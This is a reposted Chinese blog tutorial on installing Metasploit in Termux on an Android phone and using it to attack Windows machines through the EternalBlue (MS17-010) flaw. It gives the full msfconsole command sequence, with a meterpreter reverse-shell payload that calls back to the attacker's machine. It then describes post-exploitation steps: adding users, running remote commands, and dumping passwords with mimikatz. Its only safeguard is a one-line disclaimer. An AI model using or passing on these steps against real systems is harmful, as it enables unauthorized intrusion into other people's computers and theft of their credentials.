mua

在安卓对windows进行永恒之蓝攻击
注意!!!请勿用于非法用途!发生任何事都与本人无关不负任何责任!!!简介:Metasploit是一款强大的渗透测试...
扫描右侧二维码阅读全文
28
2019/01

在安卓对windows进行永恒之蓝攻击

注意!!!请勿用于非法用途!发生任何事都与本人无关不负任何责任!!!
简介:Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,简称MSF

本文演示如何在手机上运行Metasploit并且实现"永恒之蓝"渗透内网windows主机!由于安卓平台的特殊性,要在Termux上部署MSF!

重要提醒:强烈建议用联通4g网络安装MSF,安装出错90%都是由于网络问题导致的!!!


步骤1:点击下载并安装Termux.apk,第一次启动会下载系统,加载速度由网络决定。(如果不翻蔷下载会很慢很慢)

步骤2: 执行apt update && apt upgrade命令,Termux将会更新软件源并升级软件包。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)

步骤3: 执行apt install curl proot命令,Termux将会安装curl。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)

步骤4: 执行curl -L https://Auxilus.github.io/metasploit.sh > metasploit.sh命令,Termux将会下载MSF安装脚本。

步骤5: 执行chmod +x metasploit.sh && ./metasploit.sh命令,Termux将会自动安装MSF。(在此过程中会提示安装多个软件包,输入y回车即可,请耐心等待!我安装的时候整整花了半个小时!)

步骤6: 以上所有步骤完成之后,执行msfconsole命令即可启动metasploit神器!(启动速度有点慢,一般不会超过3分钟)——启动界面如下图:
演示1

到这里Metasploit的安装就完成了!下面我演示一下攻击windows的"永恒之蓝"漏洞:

第一步,首先要找到一个开着445端口的靶机的ip,你可以用nmap扫描网段,也可以自己找,找ip的方法靠自己。这里我就示范一下攻击10.1.100.181这台windows,先启动msf,然后执行下面的命令:


use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.1.100.181
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.13.175.191
set lport 5555
exploit

解释一下语句的作用,use exploit/windows/smb/ms17_010_eternalblue就是使用ms17_010_eternalblue永恒之蓝模块,set rhost 10.1.100.181就是设置靶机ip地址,set lhost 10.13.175.191就是设置本机ip地址,你需要使用就修改两个ip地址就行了,其它不用修改。——入侵成功如下图:

演示2
现在这台windows就相当于被我拿下了,这时候执行screenshot可以获得该电脑的截图,执行shell可以在该电脑运行cmd命令,并可以添加用户,执行load mimikatz加载密码模块,使用命令wdigest获取电脑的账户密码,还有开启远程端口直接用自己的电脑控制那台windows等等等等,此处省略一万字。这里就拿永恒之蓝作为例子,更多技术你们自己去谷歌学习吧!


本文转自:https://www.yyhy.me/1770.html

Last modification:February 23rd, 2019 at 11:03 am

Leave a Comment

One comment

  1. VulGhost

    之前正想在termux里安装MSF框架 昨天凑巧在酷安Termux评论区里刷到表哥这篇文章 我按照表哥的教程安装完MSF后 用msfconsole启动MSF时结果报错 因为这块发不了报错图 所以我去酷安评论区表哥的帖子里贴出报错图 表哥看看怎么解决呀 急死我了都